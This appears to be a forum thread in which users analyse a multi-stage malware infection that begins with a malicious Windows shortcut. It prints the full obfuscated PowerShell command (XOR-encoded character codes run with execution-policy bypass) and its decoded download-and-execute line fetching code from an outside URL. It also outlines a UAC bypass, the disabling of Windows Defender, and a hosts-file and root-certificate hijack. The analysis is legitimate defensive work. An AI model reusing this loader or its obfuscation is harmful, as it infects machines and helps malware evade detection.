Is this is a malware invocation of Powershell?

This is definitely malware!

Basically this is a malware with multiple stages. So far I have gone through:

Stage 1 (the .lnk file)

Downloads and executes powershell code from http://zvd.us/1

Stage 2

The downloaded powershell code contains a verbatim copy of https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1, which seems to be some UAC bypass. It then downloads and executes (as admin) a batch file.

Stage 3

The batch file first tries to disable all Windows Defender components (drivers, scheduled tasks, autorun entries) and adds group policies to that effect. It then downloads and executes 2 files. I will post virus total links to the files.

  1. https://www.virustotal.com/#/file/29ea855339856181c2419b9573b8fd7aafb55b5d1cc0d5c9cb2648e2ef2582f7
  2. https://www.virustotal.com/#/file/6055ef00b9b5f1d7a5c05ef9649d367bab071db3736d8dca2bac67d0afe768de

The first seems to be a recognised malware. Whereas the second is an NSIS installer which I have yet to analyze fully. It seems replace the systems hosts file with it's own, redirecting many domains to 80.241.222.137 and it installs a root certificate.


@zoredache seems to have the jist. It's just executing the command in a window with noprofile loaded with execution policy in bypass mode (don't require code signing).

You can test with the following (I've added the 3 parenthesis at the end but I feel something is missing.)

$value = [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82)))
Write-Host $value
2695777870303302222112917319113928491937430109717774918316112917416105919212582

No idea what that code is but I think the idea was to concatenate DEC ASCII character codes into a string. Your "Hallo World!" appears to be off the mark from what I can tell. For starters, there's a lot more characters in the string that you've got.

http://www.asciitable.com/ would suggest the following:

SUB _ M N F RS ETX RS SYN SYN p [ I DC3 q \ T [ ] J RS m G M J [ S DLE p [ J DLE i Z \ } R


I got a bit further with this, as the same just happened on my partner's computer. The LNK file's target is actually much longer than what fits in the box in the properties window. With linkanalyzer I retrieved the full target:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP  [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82 ,87, 91 , 80 ,74 ,23 , 23,16,122,81 ,73,80 ,82 , 81 , 95, 90 , 109, 74 ,76,87,80 , 89,22, 25 , 86 , 74, 74 ,78, 4, 17 ,17 , 68,72 , 92 ,16 ,75,77 ,17 ,15 ,25,23 ,5 , 119, 123 ,102 ,30, 26, 95, 77 ,78 , 70 )|fOReAch-ObjECT {[cHAr] ($_ -bXOr'0x3E')}) ) | .( $EnV:coMsPeC[4,24,25]-jOiN'')

In the above command, everything up to the |. creates a list of numbers, does some sort of binary XOR operation on each of the numbers, then joins the result as a string. I believe this is a way of obfuscating code. The result is:

$aspx = ((New-Object System.Net.WebClient)).DownloadString('http://zvb.us/1');IEX $aspx

This then gets piped into ( $EnV:coMsPeC[4,24,25]-jOiN'').

COMSPEC is the command line interpreter, but I don't know what the [4,24,25]-jOiN part is supposed to do. In the best case it just downloads the URL in the DownloadString function and that's all; in the worst case it downloads something then executes that. I'm not brave enough to follow the URL.

All in all I would say this does look very much like malware, but it would be great if someone with experience in powershell could comment.